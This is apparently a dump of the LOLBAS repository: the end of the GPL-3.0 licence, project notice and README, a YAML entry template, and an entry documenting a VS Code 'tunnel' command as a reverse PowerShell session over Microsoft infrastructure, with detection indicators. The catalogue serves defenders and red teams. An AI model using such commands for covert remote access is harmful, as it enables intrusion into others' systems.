  Conveying under any other circumstances is permitted solely under
the conditions stated below.  Sublicensing is not allowed; section 10
makes it unnecessary.

  3. Protecting Users' Legal Rights From Anti-Circumvention Law.

  No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.

  When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.

  4. Conveying Verbatim Copies.

  You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.

  You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.

  5. Conveying Modified Source Versions.

  You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:

    a) The work must carry prominent notices stating that you modified
    it, and giving a relevant date.

    b) The work must carry prominent notices stating that it is
    released under this License and any conditions added under section
    7.  This requirement modifies the requirement in section 4 to
    "keep intact all notices".

    c) You must license the entire work, as a whole, under this
    License to anyone who comes into possession of a copy.  This
    License will therefore apply, along with any applicable section 7
    additional terms, to the whole of the work, and all its parts,
    regardless of how they are packaged.  This License gives no
    permission to license the work in any other way, but it does not
    invalidate such permission if you have separately received it.

    d) If the work has interactive user interfaces, each must display
    Appropriate Legal Notices; however, if the Program has interactive
    interfaces that do not display Appropriate Legal Notices, your
    work need not make them do so.

  A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit.  Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.

  6. Conveying Non-Source Forms.

  You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:

    a) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by the
    Corresponding Source fixed on a durable physical medium
    customarily used for software interchange.

    b) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by a
    written offer, valid for at least three years and valid for as
    long as you offer spare parts or customer support for that product
    model, to give anyone who possesses the object code either (1) a
    copy of the Corresponding Source for all the software in the
    product that is covered by this License, on a durable physical
    medium customarily used for software interchange, for a price no
    more than your reasonable cost of physically performing this
    conveying of source, or (2) access to copy the
    Corresponding Source from a network server at no charge.

    c) Convey individual copies of the object code with a copy of the
    written offer to provide the Corresponding Source.  This
    alternative is allowed only occasionally and noncommercially, and
    only if you received the object code with such an offer, in accord
    with subsection 6b.

    d) Convey the object code by offering access from a designated
    place (gratis or for a charge), and offer equivalent access to the
    Corresponding Source in the same way through the same place at no
    further charge.  You need not require recipients to copy the
    Corresponding Source along with the object code.  If the place to
    copy the object code is a network server, the Corresponding Source
    may be on a different server (operated by you or a third party)
    that supports equivalent copying facilities, provided you maintain
    clear directions next to the object code saying where to find the
    Corresponding Source.  Regardless of what server hosts the
    Corresponding Source, you remain obligated to ensure that it is
    available for as long as needed to satisfy these requirements.

    e) Convey the object code using peer-to-peer transmission, provided
    you inform other peers where the object code and Corresponding
    Source of the work are being offered to the general public at no
    charge under subsection 6d.

  A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.

  A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling.  In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage.  For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product.  A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.

  "Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source.  The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.

  If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information.  But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).

  The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed.  Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.

  Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.

  7. Additional Terms.

  "Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law.  If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.

  When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it.  (Additional permissions may be written to require their own
removal in certain cases when you modify the work.)  You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.

  Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:

    a) Disclaiming warranty or limiting liability differently from the
    terms of sections 15 and 16 of this License; or

    b) Requiring preservation of specified reasonable legal notices or
    author attributions in that material or in the Appropriate Legal
    Notices displayed by works containing it; or

    c) Prohibiting misrepresentation of the origin of that material, or
    requiring that modified versions of such material be marked in
    reasonable ways as different from the original version; or

    d) Limiting the use for publicity purposes of names of licensors or
    authors of the material; or

    e) Declining to grant rights under trademark law for use of some
    trade names, trademarks, or service marks; or

    f) Requiring indemnification of licensors and authors of that
    material by anyone who conveys the material (or modified versions of
    it) with contractual assumptions of liability to the recipient, for
    any liability that these contractual assumptions directly impose on
    those licensors and authors.

  All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10.  If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term.  If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.

  If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.

  Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.

  8. Termination.

  You may not propagate or modify a covered work except as expressly
provided under this License.  Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).

  However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.

  Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.

  Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License.  If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.

  9. Acceptance Not Required for Having Copies.

  You are not required to accept this License in order to receive or
run a copy of the Program.  Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance.  However,
nothing other than this License grants you permission to propagate or
modify any covered work.  These actions infringe copyright if you do
not accept this License.  Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.

  10. Automatic Licensing of Downstream Recipients.

  Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License.  You are not responsible
for enforcing compliance by third parties with this License.

  An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations.  If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.

  You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License.  For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.

  11. Patents.

  A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based.  The
work thus licensed is called the contributor's "contributor version".

  A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version.  For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.

  Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.

  In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement).  To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.

  If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients.  "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.

  If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.

  A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License.  You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.

  Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.

  12. No Surrender of Others' Freedom.

  If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License.  If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all.  For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.

  13. Use with the GNU Affero General Public License.

  Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work.  The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.

  14. Revised Versions of this License.

  The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time.  Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.

  Each version is given a distinguishing version number.  If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation.  If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.

  If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.

  Later license versions may give you additional or different
permissions.  However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.

  15. Disclaimer of Warranty.

  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

  16. Limitation of Liability.

  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.

  17. Interpretation of Sections 15 and 16.

  If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.

                     END OF TERMS AND CONDITIONS

            How to Apply These Terms to Your New Programs

  If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.

  To do so, attach the following notices to the program.  It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.

    <one line to give the program's name and a brief idea of what it does.>
    Copyright (C) <year>  <name of author>

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <https://www.gnu.org/licenses/>.

Also add information on how to contact you by electronic and paper mail.

  If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:

    <program>  Copyright (C) <year>  <name of author>
    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
    This is free software, and you are welcome to redistribute it
    under certain conditions; type `show c' for details.

The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License.  Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".

  You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.

  The GNU General Public License does not permit incorporating your program
into proprietary programs.  If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library.  If this is what you want to do, use the GNU Lesser General
Public License instead of this License.  But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.


================================================
FILE: NOTICE.md
================================================
## Purpose

* The LOLBAS Project is a community-driven open-source resource for documenting "Living-Off-The-Land" commands and techniques that are associated with common "Living-Off-The-Land" binaries (lolbins), scripts, and libraries within Microsoft(R) Windows(R) and associated software products. This notice serves as the primary document for terms, disclaimer, usage, structure, and license acknowledgements.

* Please refer to the README.md for "Living-Off-The-Land" criteria and definition.

* "LOLBAS Project" and "LOLBAS" are used interchangeably in this document and refer to the "LOLBAS Project"

## Project License

* The LOLBAS Project is licensed under GPL 3.0. For license information, please refer to the [LICENSE file](/LICENSE).

## Definitions

* Submitter: An individual, group, organization, or entity that contributes to the LOLBAS project through project maintenance, issue submission, Pull Request (PR) submission, etc.
* Consumer: An individual, group, organization, or entity that uses ("consumes") the LOLBAS project resources through the web portal or repository interfaces and capabilities.
* LOLBAS: Living Off The Land Binaries and Scripts
* LOLBIN: Living Off The Land Binary
* LOL/"lol": Living Off The Land

## Project Terms of Use & Disclaimers

* The content presented in the LOLBAS Project, an open-source project, is for educational and informational purposes only. By using this project, including information presented on all project pages and resources in the project repository, you agree that the project authors and maintainers shall not be liable and/or held responsible/accountable for any damages resulting from the presentation, use, or misuse of the information contained on any project pages and repository documents.

* The LOLBAS Project does NOT claim that detection resources/information provided on any project pages and repository documents offer complete and proper defensive/analytic coverage for documented and undocumented LOLBIN commands, techniques, and/or use cases. 

* The LOLBAS project is a consumable resource for commercial entities, private entities, and individuals. LOLBAS includes and references resources from open and public sources to enhance content quality, however, the LOLBAS Project does not endorse any particular entity, vendor, project, group, or individual. Furthermore, use of the LOLBAS project or any LOLBAS site/repository content by commercial entities, private entities, and individuals does not imply endorsement.

* LOLBAS references and links to many external/3rd party resources. Linked sites and references are not under the control of the LOLBAS Project, and as such, the LOLBAS Project is not responsible for content of external/3rd party resource sites. Furthermore, linking of external/3rd party resources does not imply endorsement of those who manage or maintain those resources.

## Project Usage

* For consuming content on the LOLBAS Project, please refer to the content on this page, navigate to resources under [/yml](/yml), and/or visit: https://lolbas-project.github.io.
* For making a contribution to the LOLBAS Project, please refer to this notice, [README.md](/README.md), and [CONTRIBUTING.md](/CONTRIBUTING.md).

## LOLBAS Entry Structure & Information

* `Name` Field: The name of the LOL binary, script, or library resource.

* `Description` Field: A short sentence of the legitimate functionality of the 'lol' resource.

* `Author` Field: The submitter of the 'lol' resource.

* `Created` Field: The date when the 'lol' resource is submitted or this entry is created.

* `Commands` Field: Contains subfields to describe usage of the 'lol' resource. Includes:
  * `Command` (the command or sequence of commands/details needed to perform the 'lol' effect);
  * `Description` (details of the 'lol' command behavior);
  * `Usecase` (details of the use case such as the purpose and technique;
  * `Category` (LOLBAS categories include AWL Bypass - Application Control Bypass; Execution; Defense Evasion; Download, Upload, Copy, Encode, Decode, Compile, ADS - Alternate Data Stream, UAC Bypass - User Account Control Bypass, Credentials - Harvest/Dump Credentials, Reconnaissance, Tamper);
  * `Privilege` (User or Administrator level privileges required);
  * `MitreId`[^1] (MITRE (R) ATT&CK(R) Tactic/Technique mapping);
  * `OperatingSystem` (version such as Windows 10).

* `FullPath` Field: Includes the `Path` subfield to record commonly located file system paths of the 'lol' resource.

* `Code Sample` Field: Includes the `Code` subfield to specify a link to a code snippet (if applicable).

* `Detection` Field: Contains subfields to describe potential detection criteria of the 'lol' resource. Includes:
  * `Sigma`[^2] (a link to Sigma detection rule on Sigma's git repository);
  * `Splunk`[^2] (a link to Splunk detection rule on Splunk's git repository);
  * `Elastic`[^2] (a link to Elastic detection rule on Elastic's git repository);
  * `IOC`[^3] (to provide information about indicators of compromise);
  * `Analysis`[^4] (a placeholder for linked resources - e.g. blog, gist, write-up, Twitter post, etc.).

* `Resources` Field[^5]: The `Link` subfield is a placeholder for a referenced resource link about the 'lol' resource.

* `Acknowledgements` Field: Includes the following subfields:
  * `Person` (identifies the individual who originally discovered the technique/command);
  * `Handle` (the person's Twitter handle if applicable).


[^1]: Note on MITRE(R) ATT&CK(R) Reference Model: Since the ATT&CK(R) model is widely adopted, LOLBAS attempts map to the appropriate technique if applicable. The applicable ATT&CK(R) license appears in the 'Licenses' section.

[^2]: Note on Detection References: LOLBAS does not guarantee that a particular detection reference included by a submitter/maintainer will detect associated LOLBIN behavior. The reference is simply an acknowledgment that a resource exists, and the resource could potentially be useful for a consumer. Furthermore, LOLBAS does not endorse any referenced project over another, but rather, appreciates the efforts made by individuals and organizations for providing publicly available resources/projects. Consumers of such projects are encouraged to understand a referenced project's Terms of Use and abide by the project's licensing criteria if applicable. 

[^3]: Note on Detection IOCs: LOLBAS does not guarantee that a particular detection IOC included by a submitter/maintainer will detect associated LOLBIN behavior.

[^4]: Note on Detection Analysis Links: A linked analysis resource under the Detection Field (e.g. blog, gist, write-up, etc.) and contents provided by a submitter/maintainer are not endorsed by the LOLBAS project. However, LOLBAS does appreciate the efforts made by individuals and organizations for providing publicly available resources. Consumers of the 'Analysis' resource are encouraged to understand the respective resource's Terms of Use and abide by the resource's licensing criteria if applicable.

[^5]: Note on Resource Links: A linked resource under the Resources Field (e.g. blog, gist, write-up, Twitter post, etc.) and contents provided by submitters/maintainers are not endorsed by the LOLBAS project. However, LOLBAS does appreciate the efforts made by individuals and organizations for providing publicly available resources. Consumers of the linked resource are encouraged to understand the respective resource's Terms of Use and abide by the resource's licensing criteria if applicable.

## MITRE ATT&CK License

* MITRE ATT&CK Terms of Use Link: https://attack.mitre.org/resources/terms-of-use/

LICENSE
The MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use ATT&CK® for research, development, and commercial purposes. Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy.

"© 2021 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation."

DISCLAIMERS
MITRE does not claim ATT&CK enumerates all possibilities for the types of actions and behaviors documented as part of its adversary model and framework of techniques. Using the information contained within ATT&CK to address or cover full categories of techniques will not guarantee full defensive coverage as there may be undisclosed techniques or variations on existing techniques not documented by ATT&CK.

ALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN "AS IS" BASIS AND THE CONTRIBUTOR, THE ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS, AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.

## Other Notices

* Microsoft(R) Windows(R) is a registered trademark of the Microsoft Corporation


================================================
FILE: README.md
================================================
<p align="center">
    <a href="https://github.com/LOLBAS-Project/LOLBAS/actions/workflows/yaml-linting.yml/badge.svg?branch=master">
        <img src="https://img.shields.io/github/actions/workflow/status/LOLBAS-Project/LOLBAS/yaml-linting.yml?branch=master" /></a>
    <a href="https://github.com/LOLBAS-Project/LOLBAS">
        <img src="https://lolbas-project.github.io/assets/lolbas-count.svg" /></a>
    <a href="https://github.com/LOLBAS-Project/LOLBAS/stargazers">
        <img src="https://img.shields.io/github/stars/LOLBAS-Project/LOLBAS?style=social" /></a>
</p>

# Living Off The Land Binaries and Scripts (and now also Libraries)

<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBAS.png" height="250">

All the different files can be found behind a fancy frontend here: https://lolbas-project.github.io (thanks @ConsciousHacker for this bit of eyecandy and the team over at https://gtfobins.github.io/).
This repo serves as a place where we maintain the YML files that are used by the fancy frontend.

## Goal

The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.

## Criteria

A LOLBin/Lib/Script must:

* Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft.
* Have extra "unexpected" functionality. It is not interesting to document intended use cases.
  * Exceptions are application whitelisting bypasses
* Have functionality that would be useful to an APT or red team

Interesting functionality can include:

* Executing code
  * Arbitrary code execution
  * Pass-through execution of other programs (unsigned) or scripts (via a LOLBin)
* Compiling code
* File operations
  * Downloading
  * Upload
  * Copy
* Persistence
  * Pass-through persistence utilizing existing LOLBin
  * Persistence (e.g. hide data in ADS, execute at logon)
* UAC bypass
* Credential theft
* Dumping process memory
* Surveillance (e.g. keylogger, network trace)
* Log evasion/modification
* DLL side-loading/hijacking without being relocated elsewhere in the filesystem.

We do not approve binaries that allows for netntlm coercing, since most Windows binaries allows for that. Only exception is binaries that allows that on other than default ports (such as rpcping) or can allow direct credential theft. 

## Contributing

If you have found a new LOLBin or LOLScript that you would like to contribute, please review the contributing guidelines located here: https://github.com/LOLBAS-Project/LOLBAS/blob/master/CONTRIBUTING.md

A template for the required format has been provided here: https://github.com/LOLBAS-Project/LOLBAS/blob/master/YML-Template.yml

## The History of the LOLBin

The phrase "Living off the land" was coined by Christopher Campbell (@obscuresec) & Matt Graeber (@mattifestation) at [DerbyCon 3](https://www.youtube.com/watch?v=j-r6UonEkUw).

The term LOLBins came from a Twitter discussion on what to call binaries that can be used by an attacker to perform actions beyond their original purpose. Philip Goh (@MathCasualty) [proposed LOLBins](https://twitter.com/MathCasualty/status/969174982579273728). A highly scientific internet poll ensued, and after a general consensus (69%) was reached, the name was [made official](https://twitter.com/Oddvarmoe/status/985432848961343488). Jimmy (@bohops) [followed up with LOLScripts](https://twitter.com/bohops/status/984828803120881665). No poll was taken.

Common hashtags for these files are:

* #LOLBin
* #LOLBins
* #LOLScript
* #LOLScripts
* #LOLLib
* #LOLLibs

Our primary maintainer (@oddvarmoe) of this project did a talk at DerbyCon 2018 called: #Lolbins Nothing to LOL about! - https://www.youtube.com/watch?v=NiYTdmZ8GR4
This talk goes over the history of this project. 

## Maintainers

The following folks help maintain the LOLBAS Project on their personal time:

* Oddvar Moe ([@oddvarmoe](https://twitter.com/Oddvarmoe))
* Jimmy Bayne ([@bohops](https://twitter.com/bohops))
* Conor Richard ([@xenosCR](https://twitter.com/xenosCR))
* Chris 'Lopi' Spehn ([@ConsciousHacker](https://twitter.com/ConsciousHacker))
* Liam ([@liamsomerville](https://twitter.com/liamsomerville))
* Wietze ([@Wietze](https://twitter.com/@Wietze))
* Jose Hernandez ([@_josehelps](https://twitter.com/_josehelps))

## Thanks

As with many open-source projects, this one is the product of a community and we would like to thank ours:

* The domain http://lolbins.com has been registered by an unknown individual and redirected it to the old version of this project.
* The domain http://lolbas-project.com has been registered by Jimmy (@bohops).
* The logos for the project were created by Adam Nadrowski (@_sup_mane). We #@&!!@#! love them.

## Notice

* Please refer to NOTICE.md for license information


================================================
FILE: YML-Template.yml
================================================
---
Name: Binary.exe
Description: Something general about the binary
Aliases:  # Optional field if any common aliases exist of the binary with nearly the same functionality,
  - Alias: Binary64.exe  # but for example, is built for different architecture.
Author: The name of the person that created this file
Created: 1970-01-01 # YYYY-MM-DD (date the person created this file)
Commands:
  - Command: The command
    Description: Description of the command
    Usecase: A description of the usecase
    Category: Execute
    Privileges: Required privs
    MitreID: T1055
    OperatingSystem: Windows 10 1803, Windows 10 1703
    Tags:
      - Key1: Value1  # Optional field for one or more tags
  - Command: The second command
    Description: Description of the second command
    Usecase: A description of the usecase
    Category: AWL Bypass
    Privileges: Required privs
    MitreID: T1033
    OperatingSystem: Windows 10 All
Full_Path:
  - Path: c:\windows\system32\bin.exe
  - Path: c:\windows\syswow64\bin.exe
Code_Sample:
  - Code: http://example.com/git.txt
Detection:
  - IOC: Event ID 10
  - IOC: binary.exe spawned
  - Analysis: https://example.com/to/blog/gist/writeup/if/applicable
  - Sigma: https://example.com/to/sigma/rule/if/applicable
  - Elastic: https://example.com/to/elastic/rule/if/applicable
  - Splunk: https://example.com/to/splunk/rule/if/applicable
  - BlockRule: https://example.com/to/microsoft/block/rules/if/applicable
Resources:
  - Link: http://blogpost.com
  - Link: http://twitter.com/something
  - Link: http://example.com/Threatintelreport
Acknowledgement:
  - Person: John Doe
    Handle: '@johndoe'
  - Person: Ola Norman
    Handle: '@olaNor'


================================================
FILE: yml/HonorableMentions/Code.yml
================================================
---
Name: code.exe
Description: VSCode binary, also portable (CLI) version
Author: PfiatDe
Created: 2023-02-01
Commands:
  - Command: code.exe tunnel --accept-server-license-terms --name "tunnel-name"
    Description: Starts a reverse PowerShell connection over global.rel.tunnels.api.visualstudio.com via websockets; command
    Usecase: Reverse PowerShell session over MS provided infrastructure.
    Category: Execute
    Privileges: User
    MitreID: T1219.001
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: 'C:\Users\<username>\AppData\Local\Programs\Microsoft VS Code\Code.exe'
  - Path: C:\Program Files\Microsoft VS Code\Code.exe
  - Path: C:\Program Files (x86)\Microsoft VS Code\Code.exe
Detection:
  - IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com
  - IOC: 'Process tree: code.exe -> cmd.exe -> node.exe -> winpty-agent.exe'
  - IOC: 'File write of code_tunnel.json which is parametizable, but defaults to: %UserProfile%\.vscode-cli\code_tunnel.json'
Resources:
  - Link: https://badoption.eu/blog/2023/01/31/code_c2.html
  - Link: https://code.visualstudio.com/docs/remote/tunnels
  - Link: https://code.visualstudio.com/blogs/2022/12/07/remote-even-better


================================================
FILE: yml/HonorableMentions/GfxDownloadWrapper.yml
================================================
---
Name: GfxDownloadWrapper.exe
